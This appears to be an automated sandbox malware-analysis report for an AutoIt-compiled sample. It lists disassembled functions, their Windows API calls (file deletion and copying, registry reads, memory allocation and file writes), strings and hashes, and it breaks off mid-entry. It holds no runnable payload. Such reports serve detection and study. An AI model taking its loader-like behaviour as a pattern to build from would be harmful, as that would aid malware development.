                                    control_flow_graph 1006 9cbfa4-9cc054 call 9af8a0 call 99f4ea call 9847b7 call 9cbdb4 call 984517 call 9a15e3 1019 9cc05a-9cc061 call 9cc56d 1006->1019 1020 9cc107-9cc10e call 9cc56d 1006->1020 1025 9cc067-9cc105 call 9a1dfc call 9a0d23 call 9a0cf4 call 9a1dfc call 9a0cf4 * 2 1019->1025 1026 9cc110-9cc112 1019->1026 1020->1026 1027 9cc117 1020->1027 1030 9cc11a-9cc1d6 call 9844ed * 8 call 9cc71a call 9a3499 1025->1030 1029 9cc367-9cc368 1026->1029 1027->1030 1031 9cc385-9cc393 call 9847e2 1029->1031 1065 9cc1df-9cc1fa call 9cbdf8 1030->1065 1066 9cc1d8-9cc1da 1030->1066 1069 9cc28c-9cc298 call 9a35e4 1065->1069 1070 9cc200-9cc208 1065->1070 1066->1029 1077 9cc2ae-9cc2b2 1069->1077 1078 9cc29a-9cc2a9 DeleteFileW 1069->1078 1071 9cc20a-9cc20e 1070->1071 1072 9cc210 1070->1072 1074 9cc215-9cc233 call 9844ed 1071->1074 1072->1074 1084 9cc25d-9cc273 call 9cb791 call 9a2aae 1074->1084 1085 9cc235-9cc23b 1074->1085 1080 9cc2b8-9cc32f call 9cc81d call 9cc845 call 9cb965 1077->1080 1081 9cc342-9cc356 CopyFileW 1077->1081 1078->1029 1083 9cc36a-9cc380 DeleteFileW call 9cc6d9 1080->1083 1102 9cc331-9cc340 DeleteFileW 1080->1102 1082 9cc358-9cc365 DeleteFileW 1081->1082 1081->1083 1082->1029 1083->1031 1097 9cc278-9cc283 1084->1097 1088 9cc23d-9cc250 call 9cbf2e 1085->1088 1098 9cc252-9cc25b 1088->1098 1097->1070 1100 9cc289 1097->1100 1098->1084 1100->1069 1102->1029
                                    APIs
                                      • Part of subcall function 009CBDB4: __time64.LIBCMT ref: 009CBDBE
                                      • Part of subcall function 00984517: _fseek.LIBCMT ref: 0098452F
                                    • __wsplitpath.LIBCMT ref: 009CC083
                                      • Part of subcall function 009A1DFC: __wsplitpath_helper.LIBCMT ref: 009A1E3C
                                    • _wcscpy.LIBCMT ref: 009CC096
                                    • _wcscat.LIBCMT ref: 009CC0A9
                                    • __wsplitpath.LIBCMT ref: 009CC0CE
                                    • _wcscat.LIBCMT ref: 009CC0E4
                                    • _wcscat.LIBCMT ref: 009CC0F7
                                    • _wcscmp.LIBCMT ref: 009CC03E
                                      • Part of subcall function 009CC56D: _wcscmp.LIBCMT ref: 009CC65D
                                      • Part of subcall function 009CC56D: _wcscmp.LIBCMT ref: 009CC670
                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009CC2A1
                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009CC338
                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009CC34E
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009CC35F
                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009CC371
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                    • String ID:
                                    • API String ID: 2378138488-0
                                    • Opcode ID: 5990efe141d511435a455029e0c21865a6ad462742025a4fb6fc02600131d556
                                    • Instruction ID: 56ce620847d8923a2e897ce4099b4554a9f4ffc8135927bcc88b3587c0448632
                                    • Opcode Fuzzy Hash: 5990efe141d511435a455029e0c21865a6ad462742025a4fb6fc02600131d556
                                    • Instruction Fuzzy Hash: F2C10CB1E00219ABDF11DFA5DC81FDEBBBDAF89310F0040AAF609E6151DB719A448F61
                                    Function 00983E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00983E79
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00983E88
                                    • LoadIconW.USER32(00000063), ref: 00983E9E
                                    • LoadIconW.USER32(000000A4), ref: 00983EB0
                                    • LoadIconW.USER32(000000A2), ref: 00983EC2
                                      • Part of subcall function 00984024: LoadImageW.USER32(00980000,00000063,00000001,00000010,00000010,00000000), ref: 00984048
                                    • RegisterClassExW.USER32(?), ref: 00983F30
                                      • Part of subcall function 00983F53: GetSysColorBrush.USER32(0000000F), ref: 00983F86
                                      • Part of subcall function 00983F53: RegisterClassExW.USER32(00000030), ref: 00983FB0
                                      • Part of subcall function 00983F53: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00983FC1
                                      • Part of subcall function 00983F53: 6F5133E0.COMCTL32(?), ref: 00983FDE
                                      • Part of subcall function 00983F53: 6F522980.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00983FEE
                                      • Part of subcall function 00983F53: LoadIconW.USER32(000000A9), ref: 00984004
                                      • Part of subcall function 00983F53: 6F51C400.COMCTL32(000000FF,00000000), ref: 00984013
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Load$Icon$Register$BrushClassColor$C400ClipboardCursorF5133F522980FormatImage
                                    • String ID: #$0$AutoIt v3
                                    • API String ID: 2963837899-4155596026
                                    • Opcode ID: 306d77f3c4f63f9a79fa9942dcc86dc95fc683063c25ea94d3003fe5768b4fc3
                                    • Instruction ID: c080fcea4ea142401e108d48a281108b9a4dda69074a979e8366a674d99d49d2
                                    • Opcode Fuzzy Hash: 306d77f3c4f63f9a79fa9942dcc86dc95fc683063c25ea94d3003fe5768b4fc3
                                    • Instruction Fuzzy Hash: C5212FB9D00314ABDB10DFE9EC45A99BBF5EB89710F00421AE214A72A0D77646868B91
                                    Function 00CA8728 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1289 ca8728-ca877a call ca8628 CreateFileW 1292 ca877c-ca877e 1289->1292 1293 ca8783-ca8790 1289->1293 1294 ca88dc-ca88e0 1292->1294 1296 ca8792-ca879e 1293->1296 1297 ca87a3-ca87ba VirtualAlloc 1293->1297 1296->1294 1298 ca87bc-ca87be 1297->1298 1299 ca87c3-ca87e9 CreateFileW 1297->1299 1298->1294 1300 ca87eb-ca8808 1299->1300 1301 ca880d-ca8827 ReadFile 1299->1301 1300->1294 1303 ca884b-ca884f 1301->1303 1304 ca8829-ca8846 1301->1304 1306 ca8870-ca8887 WriteFile 1303->1306 1307 ca8851-ca886e 1303->1307 1304->1294 1308 ca8889-ca88b0 1306->1308 1309 ca88b2-ca88d7 CloseHandle VirtualFree 1306->1309 1307->1294 1308->1294 1309->1294
                                    APIs
                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00CA876D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050453004.0000000000CA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CA7000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ca7000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                    • Instruction ID: 010431f209878e551291878b1683280dfd4858906933d063e7cd22fa8e9e6aca
                                    • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                    • Instruction Fuzzy Hash: A2510675A50209FBEF20DFA0CC49FEE7B79AF48704F508554F61AEA2C0DE749A449B60
                                    Function 009849FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1319 9849fb-984a25 call 98bcce RegOpenKeyExW 1322 9f41cc-9f41e3 RegQueryValueExW 1319->1322 1323 984a2b-984a2f 1319->1323 1324 9f4246-9f424f RegCloseKey 1322->1324 1325 9f41e5-9f4222 call 99f4ea call 9847b7 RegQueryValueExW 1322->1325 1330 9f423d-9f4245 call 9847e2 1325->1330 1331 9f4224-9f423b call 986a63 1325->1331 1330->1324 1331->1330
                                    APIs
                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00984A1D
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009F41DB
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009F421A
                                    • RegCloseKey.ADVAPI32(?), ref: 009F4249
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: QueryValue$CloseOpen
                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                    • API String ID: 1586453840-614718249
                                    • Opcode ID: e00bec6a20960ec539c563f7d7ccd1812275688a02f4fea609c7f9f6197a9d29
                                    • Instruction ID: 61d06400a1691c3ad018b7c5cb2e0d9a12fded8466abb24be5b610ff62577ffb
                                    • Opcode Fuzzy Hash: e00bec6a20960ec539c563f7d7ccd1812275688a02f4fea609c7f9f6197a9d29
                                    • Instruction Fuzzy Hash: 14112C71A0010DBEEB04EFE4CD86EFF7BACEF14354F104465B506D6291EA709E429B50
                                    Function 009836B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1346 9836b8-983728 CreateWindowExW * 2 ShowWindow * 2
                                    APIs
                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009836E6
                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00983707
                                    • ShowWindow.USER32(00000000,?,?,?,?,00983AA3,?), ref: 0098371B
                                    • ShowWindow.USER32(00000000,?,?,?,?,00983AA3,?), ref: 00983724
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$CreateShow
                                    • String ID: AutoIt v3$edit
                                    • API String ID: 1584632944-3779509399
                                    • Opcode ID: 6b30b8d99341d8c4bf70f1f68e7113ac7e15e048c23d9ddffbbc0ebe65065008
                                    • Instruction ID: 3aa7ca0d88b30a3918d958ea32edb10721836f2183fe868e50f96df9bff7aabb
                                    • Opcode Fuzzy Hash: 6b30b8d99341d8c4bf70f1f68e7113ac7e15e048c23d9ddffbbc0ebe65065008
                                    • Instruction Fuzzy Hash: 3DF0DA795802D47AE771D7D7AC48E672E7DD7C7F60B00001ABA04A21A0C56608D6DAB1
                                    Function 009851AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1451 9851af-9851c5 1452 9851cb-9851e0 call 986b0f 1451->1452 1453 9852a2-9852a6 1451->1453 1456 9f3ca1-9f3cb0 LoadStringW 1452->1456 1457 9851e6-985206 call 986a63 1452->1457 1460 9f3cbb-9f3cd3 call 98510d call 984db1 1456->1460 1457->1460 1461 98520c-985210 1457->1461 1469 985220-98529d call 9a0d50 call 9850e6 call 9a0d23 Shell_NotifyIconW call 98cb37 1460->1469 1473 9f3cd9-9f3cf7 call 98518c call 984db1 call 98518c 1460->1473 1464 985216-98521b call 98510d 1461->1464 1465 9852a7-9852b0 call 986eed 1461->1465 1464->1469 1465->1469 1469->1453 1473->1469
                                    APIs
                                    • _memset.LIBCMT ref: 0098522F
                                    • _wcscpy.LIBCMT ref: 00985283
                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00985293
                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009F3CB0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                    • String ID: Line:
                                    • API String ID: 1053898822-1585850449
                                    • Opcode ID: 53f55fdbc4bfb0c2e833875e338d363b88a126b2440198fb3d85586189c173aa
                                    • Instruction ID: dcad910a549ab80e96f39e66d8c5ec94251e185a2e19f6e46cdf2bd579610c80
                                    • Opcode Fuzzy Hash: 53f55fdbc4bfb0c2e833875e338d363b88a126b2440198fb3d85586189c173aa
                                    • Instruction Fuzzy Hash: 1B31CF75008740AFC325FBA0DC46FDA77D8AFC5310F00491EF59996291EB74A68DCB92
                                    Function 00984139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1486 984139-984160 call 9841a9 1489 9f3489-9f3499 call 9cc396 1486->1489 1490 984166-984174 call 9841a9 1486->1490 1494 9f349e-9f34a0 1489->1494 1490->1489 1495 98417a-984180 1490->1495 1496 9f34bf-9f3507 call 99f4ea 1494->1496 1497 9f34a2-9f34a5 call 984252 1494->1497 1499 9f34aa-9f34b9 call 9c6b49 1495->1499 1500 984186-9841a6 call 98c833 1495->1500 1506 9f3509-9f3526 call 98496c 1496->1506 1507 9f3528 1496->1507 1497->1499 1499->1496 1510 9f352a-9f353d 1506->1510 1507->1510 1512 9f36b4-9f36c5 call 9a1c9d call 984252 1510->1512 1513 9f3543 1510->1513 1523 9f36c7-9f36d7 call 984f11 call 99d8f5 1512->1523 1515 9f354a-9f354d call 984f30 1513->1515 1519 9f3552-9f3574 call 98bbfc call 9c9cab 1515->1519 1528 9f3588-9f3592 call 9c9c95 1519->1528 1529 9f3576-9f3583 1519->1529 1536 9f36dc-9f370c call 9c25b5 call 99f55e call 9a1c9d call 984252 1523->1536 1538 9f35ac-9f35b6 call 9c9c7f 1528->1538 1539 9f3594-9f35a7 1528->1539 1532 9f367b-9f368b call 98ba85 1529->1532 1532->1519 1541 9f3691-9f36ae call 984dd9 1532->1541 1536->1523 1548 9f35ca-9f35d4 call 99d90c 1538->1548 1549 9f35b8-9f35c5 1538->1549 1539->1532 1541->1512 1541->1515 1548->1532 1554 9f35da-9f35f2 call 9c2551 1548->1554 1549->1532 1560 9f3615-9f3618 1554->1560 1561 9f35f4-9f3613 call 98ce19 call 98cb37 1554->1561 1563 9f361a-9f3635 call 98ce19 call 99c2a5 call 98cb37 1560->1563 1564 9f3646-9f3649 1560->1564 1585 9f3636-9f3644 call 98bbfc 1561->1585 1563->1585 1566 9f364b-9f3654 call 9c2472 1564->1566 1567 9f3669-9f366c call 9c9c12 1564->1567 1566->1536 1577 9f365a-9f3664 call 99f55e 1566->1577 1574 9f3671-9f367a call 99f55e 1567->1574 1574->1532 1577->1519 1585->1574
                                    APIs
                                      • Part of subcall function 009841A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,009839FE,?,00000001), ref: 009841DB
                                    • _free.LIBCMT ref: 009F36B7
                                    • _free.LIBCMT ref: 009F36FE
                                      • Part of subcall function 0098C833: __wsplitpath.LIBCMT ref: 0098C93E
                                      • Part of subcall function 0098C833: _wcscpy.LIBCMT ref: 0098C953
                                      • Part of subcall function 0098C833: _wcscat.LIBCMT ref: 0098C968
                                      • Part of subcall function 0098C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0098C978
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                    • API String ID: 805182592-1757145024
                                    • Opcode ID: d1d186b6359b420c1f5adb6eae8c9b396c531b295b1efaed1efb5c9403b929ed
                                    • Instruction ID: 55c1c02228c98b62f0b2484c6ac5e4d8a66a42930956cd957ef4a26f74abb6bb
                                    • Opcode Fuzzy Hash: d1d186b6359b420c1f5adb6eae8c9b396c531b295b1efaed1efb5c9403b929ed
                                    • Instruction Fuzzy Hash: 98913F71910219AFCF04EFA4CC92AFDB7B4BF59310F108429F916EB291DB349A55CB90
                                    Function 00CAA208 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 151fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00CAA0F8: Sleep.KERNELBASE(000001F4), ref: 00CAA109
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00CAA32F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050453004.0000000000CA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CA7000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ca7000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CreateFileSleep
                                    • String ID: 7RXW5AB1R9N9M
                                    • API String ID: 2694422964-313853021
                                    • Opcode ID: 67799b6b193445083047bb5dc5dbd49d2b3cc34bce5e1fcb07612b40c30da56c
                                    • Instruction ID: 6bfdcea3f9d5a0079c769362ddad9ac4197d71c17f805ab51c32700b7b149841
                                    • Opcode Fuzzy Hash: 67799b6b193445083047bb5dc5dbd49d2b3cc34bce5e1fcb07612b40c30da56c
                                    • Instruction Fuzzy Hash: 5B51D330D04249EBEF11DBB4D809BEEBB79AF19304F004199E609BB2C1D7B91B45CB66
                                    Function 00984A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00985374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A41148,?,009861FF,?,00000000,00000001,00000000), ref: 00985392
                                      • Part of subcall function 009849FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00984A1D
                                    • _wcscat.LIBCMT ref: 009F2D80
                                    • _wcscat.LIBCMT ref: 009F2DB5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _wcscat$FileModuleNameOpen
                                    • String ID: \$\Include\
                                    • API String ID: 3592542968-2640467822
                                    • Opcode ID: 0ab41c1243e2830e0db89bffb25464313cf0f2cfe465b8973b661b540e5a1582
                                    • Instruction ID: f281bdf6a44eaeafbc264ff997f52f722b64f862c92f2cc6b40ecb7219a7f2b7
                                    • Opcode Fuzzy Hash: 0ab41c1243e2830e0db89bffb25464313cf0f2cfe465b8973b661b540e5a1582
                                    • Instruction Fuzzy Hash: ED51657D4043409FC714EFA9D981BAAB7F8FFDA300B804A2EF64597261EB319549CB51
                                    Function 009A34AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                    Download Yara Rule
                                    APIs
                                    • __getstream.LIBCMT ref: 009A34FE
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 009A3539
                                    • __wopenfile.LIBCMT ref: 009A3549
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                    • String ID: <G
                                    • API String ID: 1820251861-2138716496
                                    • Opcode ID: d011c5d47cdb58f56df8e94be1aec8ea7e3142591cfed6364f25de72fcaf6d29
                                    • Instruction ID: 82a7b5bd6e3cea00c3dcde19f71b789cf3b4dc9c3a0f3bbfba624219139fdf9b
                                    • Opcode Fuzzy Hash: d011c5d47cdb58f56df8e94be1aec8ea7e3142591cfed6364f25de72fcaf6d29
                                    • Instruction Fuzzy Hash: 0C11A770A00306ABDB11BFB49C4276E76F8AF8B350B15C925F419D7291EB34CA1197E1
                                    Function 0099D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0099D28B,SwapMouseButtons,00000004,?), ref: 0099D2BC
                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0099D28B,SwapMouseButtons,00000004,?,?,?,?,0099C865), ref: 0099D2DD
                                    • RegCloseKey.KERNELBASE(00000000,?,?,0099D28B,SwapMouseButtons,00000004,?,?,?,?,0099C865), ref: 0099D2FF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: Control Panel\Mouse
                                    • API String ID: 3677997916-824357125
                                    • Opcode ID: 139467c8870f08e026b4f3ff36c705f0b121867e52eafa68fa2977c3e9226cae
                                    • Instruction ID: 54fe7f0a92269ec6b2e916f8c84bb62bd19061c085bfb641242e799af7f48351
                                    • Opcode Fuzzy Hash: 139467c8870f08e026b4f3ff36c705f0b121867e52eafa68fa2977c3e9226cae
                                    • Instruction Fuzzy Hash: 32113976612209BFDF208FA8CC85EAF7BBCEF54745F104869E806D7110E631AE429B60
                                    Function 009A365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                    • String ID:
                                    • API String ID: 3877424927-0
                                    • Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                    • Instruction ID: dc2a922bee39842092e4a8102c9dfec1f6aec73142fa64310cad039e5c056384
